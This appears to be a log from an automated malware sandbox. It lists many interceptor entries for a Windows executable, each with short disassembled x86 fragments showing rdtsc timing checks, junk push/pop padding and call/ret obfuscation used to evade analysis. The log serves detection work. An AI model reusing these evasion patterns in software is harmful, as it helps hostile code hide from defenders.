Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B5965 second address: 7B597C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B597C second address: 7B59F7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007FF0EC6B64C8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FF0EC6B64C8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e ja 00007FF0EC6B64CCh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebp 0x00000039 call 00007FF0EC6B64C8h 0x0000003e pop ebp 0x0000003f mov dword ptr [esp+04h], ebp 0x00000043 add dword ptr [esp+04h], 0000001Dh 0x0000004b inc ebp 0x0000004c push ebp 0x0000004d ret 0x0000004e pop ebp 0x0000004f ret 0x00000050 push 00000000h 0x00000052 mov ebx, dword ptr [ebp+122D1FFBh] 0x00000058 mov ebx, edi 0x0000005a push eax 0x0000005b pushad 0x0000005c jno 00007FF0EC6B64C8h 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B59F7 second address: 7B59FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B20E5 second address: 7B20E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B20E9 second address: 7B20ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B20ED second address: 7B2115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 js 00007FF0EC6B64E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF0EC6B64D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6A1C second address: 7B6A22 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B6A22 second address: 7B6A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8866 second address: 7B88E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007FF0EC517C83h 0x0000000b push edi 0x0000000c pop edi 0x0000000d popad 0x0000000e popad 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push edi 0x00000013 call 00007FF0EC517C78h 0x00000018 pop edi 0x00000019 mov dword ptr [esp+04h], edi 0x0000001d add dword ptr [esp+04h], 0000001Bh 0x00000025 inc edi 0x00000026 push edi 0x00000027 ret 0x00000028 pop edi 0x00000029 ret 0x0000002a cld 0x0000002b push 00000000h 0x0000002d and edi, dword ptr [ebp+122D1F5Ch] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FF0EC517C78h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000018h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f stc 0x00000050 movzx ebx, bx 0x00000053 push eax 0x00000054 push eax 0x00000055 push edx 0x00000056 jnp 00007FF0EC517C7Ch 0x0000005c jnp 00007FF0EC517C76h 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B7BB6 second address: 7B7BBD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9832 second address: 7B9837 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8A82 second address: 7B8A86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B9837 second address: 7B983C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8A86 second address: 7B8A8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B983C second address: 7B9852 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jp 00007FF0EC517C78h 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8A8A second address: 7B8A90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7B8A90 second address: 7B8A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA739 second address: 7BA73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA73D second address: 7BA7A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b sub dword ptr [ebp+122D32AEh], edi 0x00000011 push 00000000h 0x00000013 cmc 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edi 0x00000019 call 00007FF0EC517C78h 0x0000001e pop edi 0x0000001f mov dword ptr [esp+04h], edi 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc edi 0x0000002c push edi 0x0000002d ret 0x0000002e pop edi 0x0000002f ret 0x00000030 push edx 0x00000031 add dword ptr [ebp+122D1D83h], edi 0x00000037 pop ebx 0x00000038 mov edi, dword ptr [ebp+122D3C72h] 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 pushad 0x00000043 popad 0x00000044 jmp 00007FF0EC517C7Ch 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BA7A2 second address: 7BA7A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BB82B second address: 7BB830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BB9C3 second address: 7BB9CD instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0EC6B64C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BB9CD second address: 7BBA64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push dword ptr fs:[00000000h] 0x00000011 movsx ebx, si 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b mov ebx, eax 0x0000001d mov eax, dword ptr [ebp+122D16CDh] 0x00000023 ja 00007FF0EC517C79h 0x00000029 push FFFFFFFFh 0x0000002b call 00007FF0EC517C83h 0x00000030 mov dword ptr [ebp+122D212Bh], eax 0x00000036 pop ebx 0x00000037 pushad 0x00000038 jnc 00007FF0EC517C7Ch 0x0000003e mov dword ptr [ebp+122D30FFh], ecx 0x00000044 popad 0x00000045 nop 0x00000046 jmp 00007FF0EC517C7Ch 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f jmp 00007FF0EC517C88h 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BE90F second address: 7BE913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BE913 second address: 7BE919 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C07AD second address: 7C07B3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C1738 second address: 7C179E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b mov dword ptr [ebp+1246077Dh], edi 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007FF0EC517C78h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 00000016h 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jmp 00007FF0EC517C87h 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+12460796h], ecx 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push edx 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C179E second address: 7C17A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C17A3 second address: 7C17AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FF0EC517C76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C17AE second address: 7C17C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop edi 0x0000000d pushad 0x0000000e jmp 00007FF0EC6B64CAh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7BF9C9 second address: 7BF9CE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C0958 second address: 7C095D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C19D3 second address: 7C19D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C459B second address: 7C459F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C459F second address: 7C45A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2771 second address: 7C2775 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C2775 second address: 7C277B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4C9F second address: 7C4CA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4CA5 second address: 7C4CAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4CAB second address: 7C4CAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5D4C second address: 7C5D55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5D55 second address: 7C5D59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4ED1 second address: 7C4ED6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C4ED6 second address: 7C4EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7C5E18 second address: 7C5E31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 je 00007FF0EC517C76h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF0EC517C7Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE750 second address: 7CE756 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE756 second address: 7CE762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF0EC517C76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7CE1F3 second address: 7CE20D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1C96 second address: 7D1CFC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ebx 0x0000000f jmp 00007FF0EC517C85h 0x00000014 pop ebx 0x00000015 mov eax, dword ptr [eax] 0x00000017 jp 00007FF0EC517C8Eh 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 pushad 0x00000022 pushad 0x00000023 jno 00007FF0EC517C76h 0x00000029 jnp 00007FF0EC517C76h 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1E11 second address: 7D1E17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1E17 second address: 7D1E25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a pushad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1E25 second address: 7D1E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F0C second address: 7D1F10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F10 second address: 7D1F16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F16 second address: 7D1F80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC517C86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FF0EC517C87h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 jmp 00007FF0EC517C88h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FF0EC517C87h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F80 second address: 7D1F84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F84 second address: 7D1F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D1F8D second address: 7D1FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF0EC6B64C8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D3296 second address: 7D32B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FF0EC517C76h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007FF0EC517C7Fh 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D32B6 second address: 7D32D6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF0EC6B64C8h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FF0EC6B64D2h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 770EBB second address: 770EEF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007FF0EC517C76h 0x0000000d jmp 00007FF0EC517C7Ah 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF0EC517C88h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D8EE2 second address: 7D8F18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 pushad 0x00000007 pushad 0x00000008 jmp 00007FF0EC6B64CFh 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007FF0EC6B64C6h 0x00000015 popad 0x00000016 jmp 00007FF0EC6B64CBh 0x0000001b pushad 0x0000001c jc 00007FF0EC6B64C6h 0x00000022 pushad 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D94BE second address: 7D94C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D94C2 second address: 7D94C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9648 second address: 7D964C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D964C second address: 7D967D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FF0EC6B64C6h 0x0000000d jmp 00007FF0EC6B64D8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D967D second address: 7D9685 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9967 second address: 7D996B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D996B second address: 7D9977 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9ADF second address: 7D9B1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0EC6B64D8h 0x00000007 jmp 00007FF0EC6B64D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FF0EC6B64C6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9B1A second address: 7D9B1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9F39 second address: 7D9F59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FF0EC6B64C6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 jc 00007FF0EC6B64EAh 0x00000018 jnp 00007FF0EC6B64D2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9F59 second address: 7D9F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7D9F5F second address: 7D9F6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007FF0EC6B64C6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 76705E second address: 767069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 772A11 second address: 772A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FF0EC6B64C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E38BC second address: 7E38C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E3A5D second address: 7E3A62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E434C second address: 7E4350 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4350 second address: 7E4354 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E4354 second address: 7E435A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E435A second address: 7E435F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E435F second address: 7E4393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0EC517C7Fh 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007FF0EC517C88h 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push ecx 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7E47C3 second address: 7E47E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007FF0EC6B64C6h 0x0000000c jmp 00007FF0EC6B64CDh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jp 00007FF0EC6B64C6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA78 second address: 7EAA7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 7EAA7E second address: 7EAA8A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
